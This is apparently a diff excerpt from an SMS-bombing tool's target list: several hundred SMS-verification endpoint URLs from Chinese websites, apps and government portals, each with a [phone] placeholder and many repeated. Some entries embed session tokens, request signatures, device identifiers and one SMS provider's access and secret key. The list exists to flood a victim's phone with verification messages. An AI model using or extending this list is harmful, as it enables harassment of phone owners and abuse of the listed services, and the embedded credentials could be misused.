"https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&business_domain=yyy_cctalk&captchaVersion=2&hpuid=785-0bCp21yf6XXmRiz-40&imgcode=&isapp=true&mobile=%2B86-[phone]&msgtype=1&sendtype=mobilemsgpwd&token=3cab2a2b042928518869ab9fee57ce03&user_domain=cc", + "https://passport.bignox.com/sso/o2/sms?method=send_mobile_login_sms&mobile=[phone]", "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://ccyagu.gswanzhong.com/Apicloud/User/sendCaptcha?Mobile=[phone]", - "http://duanxin.diluw.com/index.php?hm=[phone]&ok=", - "http://api.jzhrj.cn/api/User/SendRegCode?mobile=[phone]&signature=b9ca097bdb7678ffe631d0aecb2615e16b4986f4&timestamp=1558168022&nonce=573&appid=CalendarGPRJ", - "http://www.jxxw.com.cn/app/user/sendLoginCode?username=[phone]&sign=572bf336d708a2b8b655ea05872cb596", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "https://apis.changbalive.com/apis.php?ac=registerwithphone&curuserid=&channelsrc=appstore&version=3.0.2&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=e77c9aae3b3d1994fdb56947e974fc21fcf20f99&systemversion=12.4&device=iPhone8,1&b", - "https://plus-api.kankan.com/user/login/sms?from=IOS&mobile=[phone]&sign=b41e46a3446472eaca2c0d0618eb7abd&terminal=IOS", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://passport.fanhuan.com/login/asklogincode?callback=jQuery183041957833420943325_1584502778631&mobile=[phone]&_=1584502793693", - "http://www.huizhuang.com/m/login/getmobilecode?cate=login&mobile=[phone]&_=1551173567935", - "http://mobile.icourses.cn/hep-mobile/sword/app/register/getCodeByPhone?callback=jQuery111009421744498287961_1580993309090&phone=1557078659&_=1580993309108", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "https://n.daoxila.com/verification/appSend?mobile=[phone]&time=1564746677059", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=15", - "http://user.daojia.com/user/getSmscode?mobile=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://www.tell520.com:80/ajax/do.html?action=sendSms&type=reg&YII_CSRF_TOKEN&phone=[phone]=a70ca68498d9489dbe88e141ba49751267896313", - "https://cloud.haoyunbang.cn/user/sms/send?mobile=[phone]&appId=ios_15196397349756&t=1565073179646&sign=70723c9c61730237de0b97a02395e103", - "http://wx.airjiangxi.com/html5_jx/main?sourceid=&apptype=&appcode=&developer=&channel=&usertype=&userid=&actionCode=18&type=0&cotentType=1&mobileORemail=[phone]&ffpid=&pidNumber=", - "https://api.sharkshopping.com/ec/api?method=b2c.member2.related_sms&uname=[phone]&type=1", - "https://uas.xingshulin.com/passport/default/captcha/LOGIN/sms/[phone]?", - "https://appapi.moretickets.com/userapi/pub/v1_1/send_sms_for_regist?cellphone=[phone]&code=&isSupportSession=1&src=ios&token=5d3fa06f6d96f74c953459ba&ver=5.1.2", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://reg.suning.com:80/ajax/code/sms.do?scen=WAP_WCHAT_PUB_ACCT_UNION_LOGIN_MOBILE_REG&phoneNum=[phone]", - "http://weizhang.58.com/user/login/getcode?mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=25", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://www.dangaoss.com/h5/acc/send_code?_t=1552475308&sign=424064b2d2d003d83db05380438824cb&username=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=14", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://api2.cloudlinks.cn:80/Users/PhoneCheckCode.ashx?CountryCode=86&AppVersion=6357251&PhoneNO=[phone]", - "http://xinweixin.11183.com.cn/youzheng/login/security?phone=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://park.chemi.ren//serverpark/index.php/Api/Mobileapi/getCode?phone=[phone]&action=codeLogin&type=sms&client=android&version=2.4", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://www.easgs.cn/app/index.php?i=8&c=entry&do=sms&m=junsion_winaward_plugin_wap&mobile=[phone]", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://puser.funshion.com/user/sendappsmscodenocaptcha?app=main&app_code=iphone&cl=iphone&content=%E6%82%A8%E7%9A%84%E7%9F%AD%E4%BF%A1%E9%AA%8C%E8%AF%81%E7%A0%81%E6%98%AF%3A%25verifycode%25%E3%80%82%E6%82%A8%E7%9A%84%E6%89%8B%E6%9C%BA%E5%8F%B7%E6%AD%A3%E5%9C%A8%E4%", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://srmemberapp.srgow.com/sys/captcha/[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://mapi.wandougongzhu.cn/?method=User.sendRegCode&ch=appstore&devid=6850174bf9bcd0264c01eac202a8447e&devname=&devtype=iphone_gg&dpi=750x1334&img_fmt=webp&lang=zh-Hans-CN&loc=&model=iPhone8%2C1&network_type=wifi&os_version=12.4&phone=[phone]&rtick=1566790690.50", - "https://api.julym.com/hz/api.html?number=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "https://app.webuy.ai/greatsale/user/sendAuthCode?mobile=[phone]", - "http://zhibo.zuoyebang.com/elearning/index/sendapplytoken?phone=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://p.doras.api.vcinema.cn/v5.0/user/[phone]/send_code", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://imfreecall.3158.cn/index.php/call?CB=WebFreeCall.callResult&C=60098&T=[phone]", - "https://apis.hyguanjia.com/user/send/phone/code?clientid=1254299999&mid=1E0D9617-438F-4A0D-BED0-AEB20FF19A50&phone=[phone]&sign=jBvhDrZ6SlcNzwkCx6SIhwkLtCZZ1GCCjvPj%24%24QD8balMbMtSRigOLwJkGjU%40%40PIsjj1rTgAEWBZDHlnw3%40%40Yrg9qGdwvb5Qv4euoCCHNExqXAGhb", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://www.gmsweipai.com/gms/api/common/[phone]/requestsms/5?mchCode=861913032338784", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://dgapi.zczgcn.com/shopSupport?Mobile=[phone]&BusinessId=15886&systemType=android&appVersion=4.1.01&postTime=2019-07-19+00%3A19%3A14&timeStamp=1563466754286&method=ShopSupport.GetGuiderLoginVerifyCode&format=json&user=u1city&token=a0ea92fa90904b64becaa5b2bb0b8", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=16", - "http://api.v2.msparis.com/common/mobile?channel=App%20Store-vest&clientId=msparis-ios-4.2.4-vest&mobile=[phone]&platform=ios-vest&rent_mode=2", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "https://passport.fanli.com/mobileapi/i/user/mobileFastReg?jsoncallback=jQuery211010311191363159777_1563973948739&mobile=[phone]&countrycode=86&mobilestep=1&_=1563973948741", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://www.dgzz1.com:20002/LoginMobileYanZheng?MOBILE=[phone]", - "http://m.logofree.cn/misc.php?act=send_sms&m=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "https://put.zoosnet.net/lr/sendnote160711.aspx?tel=[phone]&ccode=&id=PUT60101350&sid=72a49eb9c9b94b2692a44daa50e2011c&cid=72a49eb9c9b94b2692a44daa50e2011c&lng=cn&p=http%3A//www.lxcpa.net/&e=&un=&ud=&on=&d=1589617104719", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://passport.iqiyi.com/apis/user/check_account.action?account=[phone]&agenttype=20&app_version=10.7.5&area_code=86&device_id=5C351103-F887-4932-BC59-58C75875EFDE&device_name=liang%E7%9A%84%20iPhone&device_type=iPhone8,1&dfp=876bc199dfb98e452da6f0f683179849687da", - "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://user.daojia.com/mobile/getcode?mobile=[phone]", - "https://consumer.fcbox.com/v1/account/sendCode?mobile=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", - "https://pass.cctalk.com/v2/Handler/UCenter?action=SendMsg&mobile=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://www.zuisgo.com/index.php?s=/api/mobile_verify_code_get_request/index2&firewallToken=jkjslfskjk8545sfsdf&uid=&token=&loginTime=&mobile=[phone]&type=register&sign=999eb3cf7e7998d07b78e21884433f74", - "https://apis.hyguanjia.com/user/send/phone/code?clientid=1254299999&mid=1E0D9617-438F-4A0D-BED0-AEB20FF19A50&phone=[phone]&sign=jBvhDrZ6SlcNzwkCx6SIhwkLtCZZ1GCCjvPj%2524%2524QD8balMbMtSRigOLwJkGjU%2540%2540PIsjj1rTgAEWBZDHlnw3%2540%2540Yrg9qGdwvb5Qv4euoCCHNExqXAGhb", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://www.jxxw.com.cn/app/user/sendLoginCode?username=[phone]&sign=572bf336d708a2b8b655ea05872cb596", - "https://passport.tianya.cn/ssl/sendSMSCode.do?countryCode=0086&mobile=[phone]&signature=ec57ab48b2c35a1f71e21989bccbcee9&uuid=385e205a-505b-49f1-a28d-abacf0c65012", - "http://mobile.health.pingan.com:80/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", - "http://wx.cq3g.cn/shop/sendSmsCode?phone=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "https://m.jf.10010.com/wx006/jf-auth/wx/getCaptcha/[phone]", - "https://passport.eqxiu.com/eqs/sms/token?phone=[phone]&type=quickLogin&checkPhone=1&channel=21&version=4.4.1", - "http://121.36.193.131/api/v3.1/thirdpartyapi/aliyunmessageapi/SendVerifyMessage?phoneNumber=86[phone]&type=1", - "https://nuc.api.mgtv.com/GetMobileCode?_support=10100001&device=Redmi&osVersion=6.0.1&appVersion=6.2.0&ticket=&userId=0&mac=i8812baafc8de4fe&osType=android&channel=qq&uuid=&endType=mgtvapp&androidid=8812baafc8de4fe4&imei=&macaddress=&seqId=&version=5.2&type=10&abro", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "https://passport.ziroom.com/verify/code/v2?phone=[phone]&type=1", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "https://client.uqbike.com/sms/sendAuthCode.do?accountId=5&phone=[phone]", - "http://m.aihuaju.com/wap/index.php?act=security&op=send_reg_mobile&mobile=[phone]", - "https://ucenter.1haitao.com/vc/mobile/SMSCode.htm?codeType=login&mobile=[phone]&sign=ea7f6860aa40d220409b892397890184", - "http://dapi.mting.info/yyting/usercenter/getVerifyCode.action?phoneNum=[phone]&type=0&token=&imei=&nwt=1&q=27&sc=", - "https://appapi-h5.yongche.com/Common/CreateAuthCode?cellphone=[phone]", - "http://www.sbsq.aliwe.com/index.php?s=%2Fapi%2Fmobile_verify_code_get_request%2Findex2&mobile=[phone]&type=register&sign=999eb3cf7e7998d07b78e21884433f74", - "https://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", - "https://shared.ivydad.com/api/mobile/member/sendSmsCode?callback=jQuery111009421744498287961_1580993309090&appid=wx0e2dec5e762806fd&version=2.8.1&app_name=ivydad&channel=App%20Store&sys_version=12.4.1&type=register&sys_type=ios&token=&member_uuid=0&device_name=iPho", - "http://www.maimaishichang.com/m/reg/motregchk.php?mob=[phone]", - "https://user.meilimei.com/taomi/user/sendSmsCaptcha?mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://app.zhigoukeji.com/index.php?s=%2Fapi%2Fmobile_verify_code_get_request%2Findex2&mobile=[phone]&type=register&sign=e6d1fbbdcd5975b310190544e9f45015", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://zaiwai.8848.com/commonService/sendNewVerificationCodeToPhone?phone=[phone]&isNewUser=1&messagePassWord=50BF9B170BC3FFD3F1F0C8E113DA88E6ADAF75D364508DB8969BA8928249E4CCD0AE01A96E8E435EDA7B5E7BB28F9D584BA1CEE44BC02D41C21D8DF04604A225", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://flights.sichuanair.com/3uair/ibe/profile/processSendSMSNew.do?ConversationID=&smsType=REGISTER&mobilePhone=[phone]&verkey=MOBILELOGIN", - "http://www.sbsq.aliwe.com/index.php?s=%2Fapi%2Fmobile_verify_code_get_request%2Findex2&mobile=[phone]&type=register&sign=999eb3cf7e7998d07b78e21884433f74", - "http://quan.lukou.com/api/sms/verification_code?phone=[phone]&sign=74F59C2BB6F3830D6EB835FDA7550EB7&t=1564024638", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://m.renwo.com/Ajax/json.ashx?at=sendregsmsvcode&m=1&mobile=[phone]&_=1551173567991", - "http://m.aihuaju.com/wap/index.php?act=security&op=send_reg_mobile&mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "https://app.aplum.com/user/sendmsg?fromApp=1&phone=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://server.daiyudianjing.com/User/GetShortMessage?phone=[phone]&type=0&Timestamp=1562547880955&Nonstr=4A4EC434EC1697BAB69253B3293FF032", - "http://app.yioucash.com/loan-h5/app/validcode/send?atype=1&phoneNo=[phone]&atype=2", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "https://puser.hnzwfw.gov.cn:8081/api/user/sms?mobile=[phone]", + "http://puser.funshion.com/user/sendappsmscodenocaptcha?app=main&app_code=iphone&cl=iphone&content=1", + "http://home.ecook.cn/user/getVerifyCode?phone=[phone]", + "http://www.cmpassport.com/openapi/sendDynaPwd?account=[phone]", + "http://zha.vvoso.com/honzhani.php?zha=[phone]&x=100", + "http://shxd.jienihua100.com/api/user/getcode?mobile=[phone]&regcode=AC04B8AE-5A73-41D1-8694-3EFD04FEB059", "https://iguanyu.com/gywebsite/common/sendVerificationCode?phone=[phone]", - "http://www.guaguale.men/api.php?act=user&key=rt1BThTaqQjjqbx1RD&phone=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://www.hyb100.com/huoyb/vc10001.action?userid=[phone]&ic10000=", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://ccyagu.gswanzhong.com/Apicloud/User/sendCaptcha?Mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://www.6dspeaker.com/sdspeaker/public?method=getPhoneCode&phone=[phone]&countryCode=%2B86&validateType=1", - "https://www.xhsd.cn/front/CheckLogin.jsp?cmd=telcheckr&Mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://app.yioucash.com/loan-h5/app/validcode/send?atype=1&phoneNo=[phone]&atype=2", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://appbackend.pohoocredit.com/pro-kuaixin-app-backend/app/user/captcha?mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "https://mp.elong.com/mobilepromotion/common/sendactivitysmscodemtools%20?activityId=9880be64-a7c2-476e-9879-2fe371910f45&mobile=[phone]&gCode=", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://passport.58.com/mobileauthcodelogin/getcode?validatecode=?=true&source=m-my&callback=jsonp_callback2&mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]&hash=9f82736455da1c53", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "https://cloud.maitao.com/auth/code?cityId=2&uid=&cfbundleversion=5.12.0&imei=32E30496-2A31-463B-A1BD-75B005303E41&channelid=AppStore&devicetoken=69103da60f6eca7a15a995f4f33371ce6413567d5df01d1335f6ab25a47a2f3c&fromapp=1&token=05F452E3F79B7410AC8962C7445483E81AD2ACC", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://jyqb.jyqb168.com/registerH5/registerCode?phone=[phone]&invite_code=MTE3MDUx&user_from=97bf875e61bd47f", - "http://m.robotest.cn/user/sms.html?tel=[phone]&hash=9f82736455da1c53", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=8", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://jdapi.jd100.com/uc/v1/getSMSCode?account=[phone]&sign_type=1&use_type=1", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://appapi.51job.com/api/user/get_verification_type.php?mobilephone=[phone]&nation=CN&type=0&format=json&guid=56fa5d7a032a8190dd9844ebaa211181&partner=237b12de4c48eacec5a368eb192c3c5e&productname=51job&uuid=e7ab248c2ba73cb851a1eb31aa138695&version=869", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://api.wangxiao.cn:80/app/user.ashx?mobile=[phone]&t=mobilelogincode", - "https://iguanyu.com/gywebsite/common/sendVerificationCode?phone=[phone]", - "https://soufunapp.3g.fang.com/http/sfservice.jsp?messagename=appSendMobileCode&mobilephone=[phone]&operatetype=0&sendvoice=0&wirelesscode=2C56469F49A8526BC922ECFA14C22AC7", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "https://pass.cctalk.com/v2/Handler/UCenter?action=SendMsg&mobile=[phone]", - "http://m.cqrenrenle.com/v3/users/code?mobile=[phone]&from=reg&packagename=com.feifan.app&platform=android", - "https://passport.fanhuan.com/login/asklogincode?callback=jQuery183041957833420943325_1584502778631&mobile=[phone]&_=1584502793693", - "https://apis.changbalive.com/apis.php?ac=registerwithphone&curuserid=&channelsrc=appstore&version=3.0.2&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=e77c9aae3b3d1994fdb56947e974fc21fcf20f99&systemversion=12.4&device=iPhone8,1&b", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://m.huibo.com/register/getAuthCode?txtPhone=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=19", - "http://www.udache.com/app/mQuickReg/getSmsCode?phone=[phone]", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "https://puser.hnzwfw.gov.cn:8081/api/user/sms?mobile=[phone]&_=1575815921608", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "https://appapi.che168.com/phone/v55/user/CreateRegLoginMobileCode.ashx?_appid=2scapp.ios&_sign=bd185e04d8bdb0422467b0f95f828b49&appversion=7.7.0&channelid=App%20Store&ip=192.168.43.151&mobile=[phone]&udid=5WklXEFrvscsddZR8s3TrLI45Bg0YEW9MkEFqRLSrR1ZKpY81h2wTw8pEHBo", - "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", - "http://case.100.com/captcha?source=57&mobile=[phone]&resend=0&mkey=customer", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://gangqinpu.yusi.tv/?urlparam=cginfo/userinfo/sendsms&phonenum=[phone]&platform=iphone&sendtype=1&version=1.5.6", - "https://john.ixiaolu.com/account/check_account_name?ab_ver=A&account_name=86-[phone]&app_channel=&device=iPhone8%2C1&device_id=5C351103-F887-4932-BC59-58C75875EFDE&login_user_id=0&pcid=ae1895f8187711a6bf727e6d14b0588d&phone_sn=9e633777bc1a27c4cb826b1a4c6309dd34eb80", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://sms.bechtech.cn/Api/send/data/json?accesskey=1730&secretkey=3f198068c6b5c1036f9b38ae0690cc244695a247&mobile=[phone]&content=您的手机验证码为:3973+,该验证码10%", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=24", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://skyapp.mackentan.com/app/v5/login/verifyuser.do?t=1565488775000&did=EVrRL0SJdF8b4aa87b41&ver=170&it=434857&username=[phone]&fit=434857&sign=df42d291c6c8487aab384f3da2f5a42f6920e76b&appid=com.jediapp.changgejiaoxue&idfa=5C351103-F887-4932-BC59-58C75875EFDE", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://www.lecake.com/customer/get-code.html?yzm=10000&mobile=[phone]&_=1551173567939", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://baiwai100.com/exam/regcheckSms.yj?telphone=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://api.wangxiao.cn/app/user.ashx?mobile=[phone]&t=mobilelogincode", - "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]&_=1570699976144", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", - "http://newm.yktour.com.cn/api/captcha/login/info/get?mobile=[phone]", - "http://i.xfvw.cn/api/sms/send?mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://wx.cq3g.cn/shop/sendSmsCode?phone=[phone]", + "https://www.xiaoying.com/user/apiCheckRegister?callback=jQuery19105981196630189294_1488300711819&mobile=[phone]", + "https://app.fangzongguan.com/fangmaster/v4.2/client/quick/user/sendCode?_token=eC1fn3C3WKrzkaIYM2EUYw%3D%3D&phone=[phone]", + "http://www.hzrc.com/ww/b/a/wwba_sendMobileCode.html?phone= [phone]", + "http://uac.10010.com:80/oauth2/OpSms?callback=jsonp1557631709566&req_time=&user_id=[phone]", + "https://www.birdnet.cn/source/plugin/login_mobile/index.php?version=4&module=[phone]", "https://suyun-guest.daojia.com/api/guest/antcheat?aLiDeviceToken=&app_idfa_real=5C351103-F887-4932-BC59-58C75875EFDE&app_source=2&app_uuid=BC445415-3280-46CD-8EF2-87936A0D762F&channel-id=Appstore&cityid=37&common_lat=29.5870231&common_lng=106.287588&imei=F3F6BCC9-", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "https://masterhands.yladm.com/user/phone/verifycode?app=gaoshou_i&brand=apple&idfa=5C351103-F887-4932-BC59-58C75875EFDE&model=iphone&phone=[phone]&refer=hometabpage&sid=appstore&sign=dfe50ccd14bb2c905e37b4706c5e633c&tcid=5f401e59cddf4345a511010d2c268592&timestamp=1", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "https://appapi-h5.yongche.com/Common/CreateAuthCode?cellphone=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://www.771ka.com/register/checkinfo?clientid=newmobile&newmobile=[phone]&_=1589617672457", - "https://papa.51nbapi.com/mobile/app/phoneCheck?phone=[phone]&appName=sujiebaitiao&appChannel=AppStore&appVersion=1.2.0&appDevice=I", - "https://logic-zone-10007.api.xlgxapp.com/315000/rider/api/v3/message/[phone]?event=OneKeyLogin", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - 